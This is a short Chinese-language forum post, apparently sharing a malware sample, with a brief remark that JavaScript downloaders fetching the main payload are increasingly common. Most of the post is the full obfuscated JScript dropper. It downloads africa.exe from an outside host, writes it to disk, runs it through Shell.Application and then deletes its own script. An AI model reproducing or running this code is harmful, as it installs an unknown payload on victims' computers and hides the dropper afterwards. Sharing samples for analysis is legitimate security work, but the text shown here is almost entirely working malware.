密碼: infected
用js再去下載主體的攻擊越來越多
畢竟代碼一換就能躲避攻擊
js分析,下載衍生物
衍生物
js代碼如下
var _0x338625=_0x5952,_0x4b2027=_0x1b4b;(function(_0xe1cebe,_0x4b4389){var _0x139232=_0x1b4b,_0x7654fa=_0x5952,_0x600465=_0xe1cebe();while(!![]){try{var _0x2dea88=-parseInt(_0x7654fa(0x145,'9qOX'))/0x1+parseInt(_0x139232(0x14a))/0x2+-parseInt(_0x7654fa(0x15a,'gY[d'))/0x3*(parseInt(_0x139232(0x14d))/0x4)+-parseInt(_0x139232(0x160))/0x5+parseInt(_0x7654fa(0x154,'Q2QR'))/0x6+-parseInt(_0x139232(0x14b))/0x7+-parseInt(_0x139232(0x153))/0x8*(-parseInt(_0x139232(0x15e))/0x9);if(_0x2dea88===_0x4b4389)break;else _0x600465['push'](_0x600465['shift']());}catch(_0x508dbe){_0x600465['push'](_0x600465['shift']());}}}(_0x4a7f,0xecf9e));function _0x4a7f(){var _0x3daba0=['WQ0MW5q0','a8olWQ7dQmoCFmo9W5nVWRiXt8kEW6K','AgVdSxhcHs3dMmoAcmo2W44','Close','WQitW6bxwddcUmkdW51ls2W','Position','GET','zCoyWPW1WO0dDgRdKSoDpSk2','WQhcQCoTW5upW4r6W7/cOqBdLq8','2564740kuRvaE','12780355TynsER','Scripting.FileSystemObject','544jKLhdy','SaveToFile','ShellExecute','ScriptFullName','WRhcK3axheBcUXRdIwOSFW3dMIVdPG','vufLoa','8hWoclw','WOSTvwOoW4NcLCkzW6L1WPRcL8k4','CreateObject','F8ofzcRdOJrVW6NcQM3cVSoY','WPeZW58+','W7NcO8oLW50e','W7O+W6y1W4ldI8oG','yCorWPiKW6FdHa0FW7OHWRW','W7JcVCk+W4G2WPhdRComWORdHCoozqdcIW','W6euWPH2yNNdS3ySsK8JWOldP8kxt8kzC8opk8kqzK1qW4v8','pmoAr8o4WRJdS2ldHXe','30300507uxdIFD','gN3cGfBcUSoJW5OYW5j4xZG','5676145ApISLg','DeleteFile','Type'];_0x4a7f=function(){return _0x3daba0;};return _0x4a7f();}var pOut=new ActiveXObject(_0x4b2027(0x14c))[_0x338625(0x151,'W)@y')](0x2)+'\x5cafrica.exe',Object=WScript[_0x4b2027(0x155)](_0x338625(0x164,'yyI#'));Object['Open'](_0x4b2027(0x147),'https://tgc8x.tk/tt/africa.exe',![]),Object[_0x338625(0x157,'Zn6c')]();var Stream=WScript[_0x338625(0x149,'c*mW')](_0x338625(0x15f,'cQB3'));function _0x5952(_0x2472bc,_0xd46f5d){var _0x4a7f41=_0x4a7f();return _0x5952=function(_0x1b4b21,_0x2feb16){_0x1b4b21=_0x1b4b21-0x145;var _0x2756c9=_0x4a7f41[_0x1b4b21];if(_0x5952['qDyJFo']===undefined){var _0x30d592=function(_0x11aea4){var _0x4e03b4='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var _0x584a07='',_0x3c7fc1='';for(var _0x3233ae=0x0,_0x2b1776,_0x5c4213,_0x2244e3=0x0;_0x5c4213=_0x11aea4['charAt'](_0x2244e3++);~_0x5c4213&&(_0x2b1776=_0x3233ae%0x4?_0x2b1776*0x40+_0x5c4213:_0x5c4213,_0x3233ae++%0x4)?_0x584a07+=String['fromCharCode'](0xff&_0x2b1776>>(-0x2*_0x3233ae&0x6)):0x0){_0x5c4213=_0x4e03b4['indexOf'](_0x5c4213);}for(var _0x4f2f0b=0x0,_0xf7e0eb=_0x584a07['length'];_0x4f2f0b<_0xf7e0eb;_0x4f2f0b++){_0x3c7fc1+='%'+('00'+_0x584a07['charCodeAt'](_0x4f2f0b)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x3c7fc1);};var _0x5952af=function(_0x13ce99,_0x4baef0){var _0x2d8e87=[],_0x237a26=0x0,_0x25ca3d,_0x32fd56='';_0x13ce99=_0x30d592(_0x13ce99);var _0xc5fcf3;for(_0xc5fcf3=0x0;_0xc5fcf3<0x100;_0xc5fcf3++){_0x2d8e87[_0xc5fcf3]=_0xc5fcf3;}for(_0xc5fcf3=0x0;_0xc5fcf3<0x100;_0xc5fcf3++){_0x237a26=(_0x237a26+_0x2d8e87[_0xc5fcf3]+_0x4baef0['charCodeAt'](_0xc5fcf3%_0x4baef0['length']))%0x100,_0x25ca3d=_0x2d8e87[_0xc5fcf3],_0x2d8e87[_0xc5fcf3]=_0x2d8e87[_0x237a26],_0x2d8e87[_0x237a26]=_0x25ca3d;}_0xc5fcf3=0x0,_0x237a26=0x0;for(var _0x1209c2=0x0;_0x1209c2<_0x13ce99['length'];_0x1209c2++){_0xc5fcf3=(_0xc5fcf3+0x1)%0x100,_0x237a26=(_0x237a26+_0x2d8e87[_0xc5fcf3])%0x100,_0x25ca3d=_0x2d8e87[_0xc5fcf3],_0x2d8e87[_0xc5fcf3]=_0x2d8e87[_0x237a26],_0x2d8e87[_0x237a26]=_0x25ca3d,_0x32fd56+=String['fromCharCode'](_0x13ce99['charCodeAt'](_0x1209c2)^_0x2d8e87[(_0x2d8e87[_0xc5fcf3]+_0x2d8e87[_0x237a26])%0x100]);}return _0x32fd56;};_0x5952['YtnAlk']=_0x5952af,_0x2472bc=arguments,_0x5952['qDyJFo']=!![];}var _0x475f4a=_0x4a7f41[0x0],_0x4ad936=_0x1b4b21+_0x475f4a,_0x909a21=_0x2472bc[_0x4ad936];return!_0x909a21?(_0x5952['JZhKii']===undefined&&(_0x5952['JZhKii']=!![]),_0x2756c9=_0x5952['YtnAlk'](_0x2756c9,_0x2feb16),_0x2472bc[_0x4ad936]=_0x2756c9):_0x2756c9=_0x909a21,_0x2756c9;},_0x5952(_0x2472bc,_0xd46f5d);}function _0x1b4b(_0x2472bc,_0xd46f5d){var _0x4a7f41=_0x4a7f();return _0x1b4b=function(_0x1b4b21,_0x2feb16){_0x1b4b21=_0x1b4b21-0x145;var _0x2756c9=_0x4a7f41[_0x1b4b21];return _0x2756c9;},_0x1b4b(_0x2472bc,_0xd46f5d);}Stream[_0x338625(0x152,'0uMo')](),Stream[_0x4b2027(0x162)]=0x1,Stream[_0x338625(0x158,'mOf)')](Object[_0x338625(0x148,'x#D7')]),Stream[_0x4b2027(0x146)]=0x0,Stream[_0x4b2027(0x14e)](pOut,0x2),Stream[_0x4b2027(0x166)](),new ActiveXObject('Shell.Application')[_0x4b2027(0x14f)](pOut,'','',_0x338625(0x163,'Zn6c'),'1'),new ActiveXObject(_0x338625(0x15c,'[F**'))[_0x4b2027(0x161)](WScript[_0x4b2027(0x150)]);
|
发表于 2022-11-2 11:09:47
